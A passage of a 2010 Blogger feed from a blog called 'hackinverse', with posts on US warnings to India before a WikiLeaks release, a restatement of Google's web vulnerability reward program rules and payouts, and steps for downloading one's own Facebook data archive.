class=&quot;Apple-style-span&quot; style=&quot;font-family: inherit;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;line-height: 16px;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: inherit;&quot;&gt;he  media has reported that the US has warned India and other key  governments across the world about the expected release.&amp;nbsp; Crowley has  been quoted as saying: &quot;We have reached out to India to warn them about a  possible release of documents.&quot; Among other Governments reportedly  cautioned are those of Israel, Russia, Turkey, Canada &amp;nbsp;and the UK.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: inherit;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;line-height: 16px;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: inherit;&quot;&gt;Among  the various events relating to Afghanistan, Iraq and Iran in which  India figured during this period, four could be sensitive from India&#39;s  point of view. Firstly, the pressure exerted on the Atal Behari Vajpayee  government by the George Bush&amp;nbsp;administration to send Indian troops to  Iraq.&amp;nbsp;By July,2003, the Vajpayee government had decided to say no to  Washington DC, but there was a lot of voices in Delhi in favour of  accepting the US request.&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;br /&gt;
&lt;div style=&quot;line-height: 18px; margin: 0px; padding: 0px 0px 1em;&quot;&gt;The game is not over yet . Wikileaks will still be publishing the documents they have.&lt;/div&gt;&lt;div style=&quot;line-height: 18px; margin: 0px; padding: 0px 0px 1em;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: inherit;&quot;&gt;We  still cant say that to which way this will go but one thing is for sure  that the whistle blower has really pissed of America. I truly want  wikileaks to do some favour on my country too and expose some scams here  in India . I feel its more needed in India.&lt;/span&gt;&lt;/div&gt;</description><link>http://hackinverse.blogspot.com/2010/12/wikileaks-will-whistle-blower-now-blow.html</link><author>noreply@blogger.com (Anonymous)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://3.bp.blogspot.com/_u_FPbAGnpWc/TQnEgZWn6ZI/AAAAAAAAAJg/TIT1kjXx0Tw/s72-c/images.jpg" height="72" width="72"/><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-7928312777523567518.post-5755121845150456704</guid><pubDate>Thu, 16 Dec 2010 06:43:00 +0000</pubDate><atom:updated>2010-12-16T12:13:27.756+05:30</atom:updated><title>Google Vulnerability Reward Program</title><description>&lt;div style=&quot;font-family: Georgia,&amp;quot;Times New Roman&amp;quot;,serif;&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;a href=&quot;http://3.bp.blogspot.com/_u_FPbAGnpWc/TQm0xmCzLqI/AAAAAAAAAJY/QYYsaHIgJ6w/s1600/canvas.png&quot; imageanchor=&quot;1&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;http://3.bp.blogspot.com/_u_FPbAGnpWc/TQm0xmCzLqI/AAAAAAAAAJY/QYYsaHIgJ6w/s1600/canvas.png&quot; /&gt;&lt;/a&gt;&lt;a href=&quot;http://2.bp.blogspot.com/_u_FPbAGnpWc/TQm01QKdBkI/AAAAAAAAAJc/SwMQnwKeCNU/s1600/index.jpg&quot; imageanchor=&quot;1&quot; style=&quot;clear: right; float: right; margin-bottom: 1em; margin-left: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;http://2.bp.blogspot.com/_u_FPbAGnpWc/TQm01QKdBkI/AAAAAAAAAJc/SwMQnwKeCNU/s1600/index.jpg&quot; /&gt;&lt;/a&gt;Back in January of this year, the Chromium open source project &lt;a href=&quot;http://blog.chromium.org/2010/01/encouraging-more-chromium-security.html&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;launched a well-received vulnerability reward program&lt;/a&gt;.  In the months since launch, researchers reporting a wide range of great  bugs have received rewards — a small summary of which can be found in  the &lt;a href=&quot;http://dev.chromium.org/Home/chromium-security/hall-of-fame&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;Hall of Fame&lt;/a&gt;.  They’ve seen a sustained increase in the number of high quality reports  from researchers, and their combined efforts are contributing to a more  secure Chromium browser for millions of users. &lt;/span&gt;&lt;/div&gt;&lt;a name=&#39;more&#39;&gt;&lt;/a&gt;&lt;div style=&quot;font-family: Georgia,&amp;quot;Times New Roman&amp;quot;,serif;&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt;Today, They are announcing an experimental new vulnerability reward  program that applies to Google web properties. They already enjoy  working with an array of researchers to improve Google security, and  some individuals who have provided high caliber reports are listed on &lt;a href=&quot;http://www.google.com/corporate/security.html&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;Their credits page&lt;/a&gt;.  As well as enabling them to thank regular contributors in a new way,  they hope their new program will attract new researchers and the types  of reports that help make their users safer.&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;font-family: Georgia,&amp;quot;Times New Roman&amp;quot;,serif;&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;span id=&quot;more-1144&quot;&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;font-family: Georgia,&amp;quot;Times New Roman&amp;quot;,serif;&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt;In the spirit of the original Chromium blog post, they have some  information about the new program in a question and answer format below:&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;font-family: Georgia,&amp;quot;Times New Roman&amp;quot;,serif;&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;b&gt;Q) What applications are in scope?&lt;/b&gt;&lt;br /&gt;
A) Any Google web  properties which display or manage highly sensitive authenticated user  data or accounts may be in scope. Some examples could include: &lt;/span&gt;&lt;/div&gt;&lt;ul style=&quot;font-family: Georgia,&amp;quot;Times New Roman&amp;quot;,serif;&quot;&gt;&lt;li&gt;&lt;span style=&quot;font-size: small;&quot;&gt;*.google.com&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;font-size: small;&quot;&gt;*.youtube.com&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;font-size: small;&quot;&gt;*.blogger.com&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;font-size: small;&quot;&gt;*.orkut.com&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;div style=&quot;font-family: Georgia,&amp;quot;Times New Roman&amp;quot;,serif;&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt;For now, Google’s client applications (e.g. Android, Picasa, Google  Desktop, etc) are not in scope. They may expand the program in the  future.&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;font-family: Georgia,&amp;quot;Times New Roman&amp;quot;,serif;&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;b&gt;Q) What classes of bug are in scope? &lt;/b&gt;&lt;br /&gt;
A) It’s difficult to  provide a definitive list of vulnerabilities that will be rewarded,  however, any serious bug which directly affects the confidentiality or  integrity of user data may be in scope. They anticipate most rewards  will be in bug categories such as: &lt;/span&gt;&lt;/div&gt;&lt;ul style=&quot;font-family: Georgia,&amp;quot;Times New Roman&amp;quot;,serif;&quot;&gt;&lt;li&gt;&lt;span style=&quot;font-size: small;&quot;&gt;XSS&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;font-size: small;&quot;&gt;XSRF / CSRF&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;font-size: small;&quot;&gt;XSSI (cross-site script inclusion)&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;font-size: small;&quot;&gt;Bypassing authorization controls (e.g. User A can access User B’s private data)&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;font-size: small;&quot;&gt;Server side code execution or command injection&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;div style=&quot;font-family: Georgia,&amp;quot;Times New Roman&amp;quot;,serif;&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt;Out of concern for the availability of their services to all users, they ask us to refrain from using automated testing tools.&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;font-family: Georgia,&amp;quot;Times New Roman&amp;quot;,serif;&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt;These categories of bugs are definitively excluded: &lt;/span&gt;&lt;/div&gt;&lt;ul style=&quot;font-family: Georgia,&amp;quot;Times New Roman&amp;quot;,serif;&quot;&gt;&lt;li&gt;&lt;span style=&quot;font-size: small;&quot;&gt;attacks against Google’s corporate infrastructure&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;font-size: small;&quot;&gt;social engineering and physical attacks&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;font-size: small;&quot;&gt;denial of service bugs&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;font-size: small;&quot;&gt;non-web application vulnerabilities, including vulnerabilities in client applications&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;font-size: small;&quot;&gt;SEO blackhat techniques&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;font-size: small;&quot;&gt;vulnerabilities in Google-branded websites hosted by third parties&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;font-size: small;&quot;&gt;bugs in technologies recently acquired by Google&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;div style=&quot;font-family: Georgia,&amp;quot;Times New Roman&amp;quot;,serif;&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;b&gt;Q) How far should I go to demonstrate a vulnerability?&lt;/b&gt;&lt;br /&gt;
A)  Please, only ever target your own account or a test account. Never  attempt to access anyone else’s data. Do not engage in any activity that  bombards Google services with large numbers of requests or large  volumes of data.&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;font-family: Georgia,&amp;quot;Times New Roman&amp;quot;,serif;&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;b&gt;Q) I’ve found a vulnerability — how do I report it?&lt;/b&gt;&lt;br /&gt;
A) Contact details are &lt;a href=&quot;http://www.google.com/corporate/security.html&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;listed here&lt;/a&gt;.  Please only use the email address given for actual vulnerabilities in  Google products. Non-security bugs and queries about problems with our  account should instead be directed to the &lt;a href=&quot;http://www.google.com/support/&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;Google Help Centers&lt;/a&gt;.&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;font-family: Georgia,&amp;quot;Times New Roman&amp;quot;,serif;&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;b&gt;Q) What reward might I get?&lt;/b&gt;&lt;br /&gt;
A) The base reward for  qualifying bugs is $500. If the rewards panel finds a particular bug to  be severe or unusually clever, rewards of up to $3,133.7 may be issued.  The panel may also decide a single report actually constitutes multiple  bugs requiring reward, or that multiple reports constitute only a single  reward.&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;font-family: Georgia,&amp;quot;Times New Roman&amp;quot;,serif;&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt;Some researchers aren’t interested in the money, so they’d also like  to give us the option to donate our reward to charity. If we do, they’ll  match it — subject to their discretion.&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;font-family: Georgia,&amp;quot;Times New Roman&amp;quot;,serif;&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt;Regardless of whether we’re rewarded monetarily or not, all  vulnerability reporters who interact with them in a respectful,  productive manner will be credited on a new vulnerability reporter page.  If they file a bug internally, we’ll be credited.&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;font-family: Georgia,&amp;quot;Times New Roman&amp;quot;,serif;&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt;Superstar performers will continue to be acknowledged under the “We Thank You” section of &lt;a href=&quot;http://www.google.com/corporate/security.html&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;this&lt;/a&gt; page.&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;font-family: Georgia,&amp;quot;Times New Roman&amp;quot;,serif;&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;b&gt;Q) How do I find out if my bug qualified for a reward?&lt;/b&gt;&lt;br /&gt;
A) We will receive a comment to this effect in an emailed response from the Google Security Team.&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;font-family: Georgia,&amp;quot;Times New Roman&amp;quot;,serif;&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;b&gt;Q) What if someone else also found the same bug&lt;/b&gt;?&lt;br /&gt;
A) Only  the first report of a given issue that we had not yet identified is  eligible. In the event of a duplicate submission, only the earliest  received report is considered.&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;font-family: Georgia,&amp;quot;Times New Roman&amp;quot;,serif;&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;b&gt;Q) Will bugs disclosed without giving Google developers an opportunity to fix them first still qualify?&lt;/b&gt;&lt;br /&gt;
A) &lt;a href=&quot;http://googleonlinesecurity.blogspot.com/2010/07/rebooting-responsible-disclosure-focus.html&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;They believe&lt;/a&gt;  handling vulnerabilities responsibly is a two-way street. It’s their  job to fix serious bugs within a reasonable time frame, and they in turn  request advance, private notice of any issues that are uncovered.  Vulnerabilities that are disclosed to any party other than Google,  except for the purposes of resolving the vulnerability (for example, an  issue affecting multiple vendors), will usually not qualify. This  includes both full public disclosure and limited private release.&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;font-family: Georgia,&amp;quot;Times New Roman&amp;quot;,serif;&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;b&gt;Q) Do I still qualify if I disclose the problem publicly once fixed?&lt;/b&gt;&lt;br /&gt;
A)  Yes, absolutely! They encourage open collaboration. They will also make  sure to credit us on their new vulnerability reporter page.&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;font-family: Georgia,&amp;quot;Times New Roman&amp;quot;,serif;&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;b&gt;Q) Who determines whether a given bug is eligible?&lt;/b&gt;&lt;br /&gt;
A) Several members of the Google Security Team including Chris Evans, Neel Mehta, Adam Mein, Matt Moore, and Michal Zalewski.&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;font-family: Georgia,&amp;quot;Times New Roman&amp;quot;,serif;&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;b&gt;Q) Are you going to list my name on a public web page?&lt;/b&gt;&lt;br /&gt;
A)  Only if you want them to. If selected as the recipient of a reward, and  we accept, they will need our contact details in order to pay us.  However, at our discretion, we can choose not to be listed on any credit  page.&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;font-family: Georgia,&amp;quot;Times New Roman&amp;quot;,serif;&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;b&gt;Q) No doubt you wanted to make some legal points?&lt;/b&gt;&lt;br /&gt;
A) Sure.  They encourage broad participation. However, they are unable to issue  rewards to individuals who are on sanctions lists, or who are in  countries (e.g. Cuba, Iran, North Korea, Sudan and Syria) on sanctions  lists. This program is also not open to minors. We are responsible for  any tax implications depending on our country of residency and  citizenship. There may be additional restrictions on our ability to  enter depending upon our local law.&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;font-family: Georgia,&amp;quot;Times New Roman&amp;quot;,serif;&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt;This is not a competition, but rather an experimental and  discretionary rewards program. We should understand that they can cancel  the program at any time, and the decision as to whether or not to pay a  reward has to be entirely at our discretion.&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;font-family: Georgia,&amp;quot;Times New Roman&amp;quot;,serif;&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt;Of course, our testing must not violate any law, or disrupt or compromise any data that is not our own.&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;font-family: Georgia,&amp;quot;Times New Roman&amp;quot;,serif;&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt;Cool isnt it? So guys why don&#39;t we try it?&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;font-family: Georgia,&amp;quot;Times New Roman&amp;quot;,serif;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;font-family: Georgia,&amp;quot;Times New Roman&amp;quot;,serif;&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt;Happy researching &lt;img alt=&quot;;)&quot; class=&quot;wp-smiley&quot; src=&quot;http://blog.crazydavinci.net/wp-includes/images/smilies/icon_wink.gif&quot; /&gt;&amp;nbsp;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;font-family: Georgia,&amp;quot;Times New Roman&amp;quot;,serif;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;font-family: Georgia,&amp;quot;Times New Roman&amp;quot;,serif;&quot;&gt; &lt;/div&gt;&lt;div style=&quot;font-family: Georgia,&amp;quot;Times New Roman&amp;quot;,serif;&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;b&gt;&lt;br /&gt;
&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;</description><link>http://hackinverse.blogspot.com/2010/12/google-vulnerability-reward-program.html</link><author>noreply@blogger.com (Anonymous)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://3.bp.blogspot.com/_u_FPbAGnpWc/TQm0xmCzLqI/AAAAAAAAAJY/QYYsaHIgJ6w/s72-c/canvas.png" height="72" width="72"/><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-7928312777523567518.post-2128595132864781809</guid><pubDate>Thu, 16 Dec 2010 06:35:00 +0000</pubDate><atom:updated>2010-12-16T12:05:35.664+05:30</atom:updated><title>DOWNLOAD!! UR ENTIRE FACEBOOK HISTORY</title><description>&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;http://3.bp.blogspot.com/_u_FPbAGnpWc/TQmzLBX855I/AAAAAAAAAJU/zUEatn54Qg0/s1600/images.jpg&quot; imageanchor=&quot;1&quot; style=&quot;clear: right; float: right; margin-bottom: 1em; margin-left: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;http://3.bp.blogspot.com/_u_FPbAGnpWc/TQmzLBX855I/AAAAAAAAAJU/zUEatn54Qg0/s1600/images.jpg&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style=&quot;line-height: 22px; margin: 0px; padding: 0px 0px 15px;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: inherit;&quot;&gt;Now it is possible to download every single bit of information you have put on Facebook,  including pictures,&amp;nbsp;status updates, events and messages. This is  undoubtedly the control many users have been looking for, and provides a  nice “grab and go” option for those fed up with the service.&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;line-height: 22px; margin: 0px; padding: 0px 0px 15px;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: inherit;&quot;&gt;The  feature should have rolled out to most accounts by now, but if it’s  still not working for you then you’ll just have to be patient and wait  your turn.&lt;a name=&#39;more&#39;&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;line-height: 22px; margin: 0px; padding: 0px 0px 15px;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: inherit;&quot;&gt;&lt;span id=&quot;more-57943&quot; style=&quot;margin: 0px; padding: 0px;&quot;&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;h2 style=&quot;clear: both; letter-spacing: -1px; line-height: 22px; margin: 0px; padding: 10px 0px; position: static;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: inherit;&quot;&gt;&lt;u&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-size: medium;&quot;&gt;Why Do I Want All That Data?&lt;/span&gt;&lt;/u&gt;&lt;/span&gt;&lt;/h2&gt;&lt;div style=&quot;line-height: 22px; margin: 0px; padding: 0px 0px 15px;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: inherit;&quot;&gt;Maybe you’re just fed up with Facebook.  You’ve been using the service for years and have watched it transform  from a useful tool for organising parties into a popularity contest for  the under 15′s. You want to jump ship.&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;line-height: 22px; margin: 0px; padding: 0px 0px 15px;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: inherit;&quot;&gt;Well now you can do that, except before you jump you can pack up all your data and download your Facebook  history. Once you’ve found a suitable alternative, like the&amp;nbsp;developing  Diaspora, you can simply upload the data you once shared on Facebook.&amp;nbsp;It’s also useful if you’ve ever wanted to give your Facebook  account a facelift and remove all the pictures you&amp;nbsp;don’t want your  boss/gran to see&amp;nbsp;(without losing them forever, although&amp;nbsp;you should have  backed them up really).&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;line-height: 22px; margin: 0px; padding: 0px 0px 15px;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: inherit;&quot;&gt;I just enjoyed looking at old status updates to be honest.&lt;/span&gt;&lt;/div&gt;&lt;h2 style=&quot;clear: both; letter-spacing: -1px; margin: 0px; padding: 10px 0px; position: static;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: inherit;&quot;&gt;&lt;u&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-size: medium;&quot;&gt;Download Instructions&lt;/span&gt;&lt;/u&gt;&lt;/span&gt;&lt;/h2&gt;&lt;div style=&quot;margin: 0px; padding: 0px 0px 15px;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: inherit;&quot;&gt;You’ll find instructions to download the data in your Account Settings page. Once you’ve logged into your Facebook account click&amp;nbsp;&lt;em style=&quot;margin: 0px; padding: 0px;&quot;&gt;Account&lt;/em&gt;&amp;nbsp;and then choose&amp;nbsp;&lt;em style=&quot;margin: 0px; padding: 0px;&quot;&gt;Account Settings&lt;/em&gt;&amp;nbsp;from the drop-down menu.&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;margin: 0px; padding: 0px 0px 15px; text-align: center;&quot;&gt;&lt;img alt=&quot;download facebook history&quot; class=&quot;aligncenter&quot; height=&quot;252&quot; src=&quot;http://main.makeuseoflimited.netdna-cdn.com/wp-content/uploads/2010/11/Selection_046.png&quot; style=&quot;border: 1px solid rgb(204, 204, 204); display: block; margin: 10px auto; padding: 3px;&quot; width=&quot;580&quot; /&gt;&lt;/div&gt;&lt;div style=&quot;margin: 0px; padding: 0px 0px 15px;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: inherit;&quot;&gt;On the first page of settings (cleverly titled&amp;nbsp;&lt;em style=&quot;margin: 0px; padding: 0px;&quot;&gt;Settings&lt;/em&gt;) you should notice a new option beneath&lt;em style=&quot;margin: 0px; padding: 0px;&quot;&gt;Account Securit&lt;/em&gt;y that says&amp;nbsp;&lt;em style=&quot;margin: 0px; padding: 0px;&quot;&gt;Download your information&lt;/em&gt;. Click on&amp;nbsp;&lt;em style=&quot;margin: 0px; padding: 0px;&quot;&gt;learn more&lt;/em&gt;&amp;nbsp;to lodge your request.&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;margin: 0px; padding: 0px 0px 15px; text-align: center;&quot;&gt;&lt;img alt=&quot;&quot; class=&quot;aligncenter&quot; height=&quot;286&quot; src=&quot;http://main.makeuseoflimited.netdna-cdn.com/wp-content/uploads/2010/11/Selection_047.png&quot; style=&quot;border: 1px solid rgb(204, 204, 204); display: block; margin: 10px auto; padding: 3px;&quot; width=&quot;580&quot; /&gt;&lt;/div&gt;&lt;div style=&quot;margin: 0px; padding: 0px 0px 15px;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: inherit;&quot;&gt;On the next screen click&amp;nbsp;&lt;em style=&quot;margin: 0px; padding: 0px;&quot;&gt;Download&lt;/em&gt;&amp;nbsp;and  you will be notified that for your data to be collected, you’ll need to  be patient and wait for Facebook’s servers to complete the request. If  you’re a bit of a Facebook addict this will probably take longer, but the download should be ready within the hour.&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;margin: 0px; padding: 0px 0px 15px; text-align: center;&quot;&gt;&lt;img alt=&quot;backup facebook&quot; class=&quot;aligncenter&quot; height=&quot;267&quot; src=&quot;http://main.makeuseoflimited.netdna-cdn.com/wp-content/uploads/2010/11/Selection_048.png&quot; style=&quot;border: 1px solid rgb(204, 204, 204); display: block; margin: 10px auto; padding: 3px;&quot; width=&quot;496&quot; /&gt;&lt;/div&gt;&lt;div style=&quot;margin: 0px; padding: 0px 0px 15px;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: inherit;&quot;&gt;Once you’ve done that it’s a case of sitting back and waiting for the email.&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;margin: 0px; padding: 0px 0px 15px; text-align: center;&quot;&gt;&lt;img alt=&quot;save facebook history&quot; class=&quot;aligncenter&quot; height=&quot;73&quot; src=&quot;http://main.makeuseoflimited.netdna-cdn.com/wp-content/uploads/2010/11/Selection_049.png&quot; style=&quot;border: 1px solid rgb(204, 204, 204); display: block; margin: 10px auto; padding: 3px;&quot; width=&quot;491&quot; /&gt;&lt;/div&gt;&lt;h2 style=&quot;clear: both; letter-spacing: -1px; margin: 0px; padding: 10px 0px; position: static;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: inherit;&quot;&gt;&lt;u&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-size: medium;&quot;&gt;Ding! Data’s Done&lt;/span&gt;&lt;/u&gt;&lt;/span&gt;&lt;/h2&gt;&lt;div style=&quot;margin: 0px; padding: 0px 0px 15px;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: inherit;&quot;&gt;Once your .ZIP file is piping hot and golden brown on the surface it’s ready. Facebook should  have emailed you a link to download the data, I received mine within 15  minutes of making the request it and the file was a surprising 62MB (I  expected it to be bigger).&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: inherit;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div style=&quot;color: #333333; font-family: Verdana,Arial,Helvetica,sans-serif; font-size: 12px; line-height: 22px; margin: 0px; padding: 0px 0px 15px; text-align: center;&quot;&gt;&lt;img alt=&quot;save facebook history&quot; class=&quot;aligncenter&quot; src=&quot;http://main.makeuseoflimited.netdna-cdn.com/wp-content/uploads/2010/11/Selection_050.png&quot; style=&quot;border: 1px solid rgb(204, 204, 204); display: block; margin: 10px auto; padding: 3px;&quot; width=&quot;580&quot; /&gt;&lt;/div&gt;&lt;div style=&quot;line-height: 22px; margin: 0px; padding: 0px 0px 15px;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: inherit;&quot;&gt;With  your .ZIP downloaded you’ll then want to&amp;nbsp;extract it. You’ll notice that  it’s separated into a few folders: html, pictures and videos as well as  a&amp;nbsp;&lt;em style=&quot;margin: 0px; padding: 0px;&quot;&gt;index.html&lt;/em&gt;&amp;nbsp;and&amp;nbsp;&lt;em style=&quot;margin: 0px; padding: 0px;&quot;&gt;readme&lt;/em&gt;&amp;nbsp;file.&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;line-height: 22px; margin: 0px; padding: 0px 0px 15px; text-align: center;&quot;&gt;&lt;img alt=&quot;save facebook history&quot; class=&quot;aligncenter&quot; height=&quot;307&quot; src=&quot;http://main.makeuseoflimited.netdna-cdn.com/wp-content/uploads/2010/11/facebook-tbrookes.zip-_051.png&quot; style=&quot;border: 1px solid rgb(204, 204, 204); display: block; margin: 10px auto; padding: 3px;&quot; width=&quot;577&quot; /&gt;&lt;/div&gt;&lt;div style=&quot;line-height: 22px; margin: 0px; padding: 0px 0px 15px;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: inherit;&quot;&gt;The&amp;nbsp;&lt;em style=&quot;margin: 0px; padding: 0px;&quot;&gt;index.html&amp;nbsp;&lt;/em&gt;file  provides a handy way to browse the data in offline mode, from the  comfort of your browser. You’re also free to go nuts and dive right into  each folder, especially handy if you’re after a specific picture.&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;line-height: 22px; margin: 0px; padding: 0px 0px 15px;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: inherit;&quot;&gt;Your  wall has essentially been preserved as it is seen on Facebook’s  website, give or take the odd bit of info. Everything has been collated  into one massively long HTML file, which can take a while to process.&lt;/span&gt;&lt;/div&gt;&lt;/div&gt;</description><link>http://hackinverse.blogspot.com/2010/12/download-ur-entire-facebook-history.html</link><author>noreply@blogger.com (Anonymous)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://3.bp.blogspot.com/_u_FPbAGnpWc/TQmzLBX855I/AAAAAAAAAJU/zUEatn54Qg0/s72-c/images.jpg" height="72" width="72"/><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-7928312777523567518.post-7776879462955605894</guid><pubDate>Thu, 16 Dec 2010 06:30:00 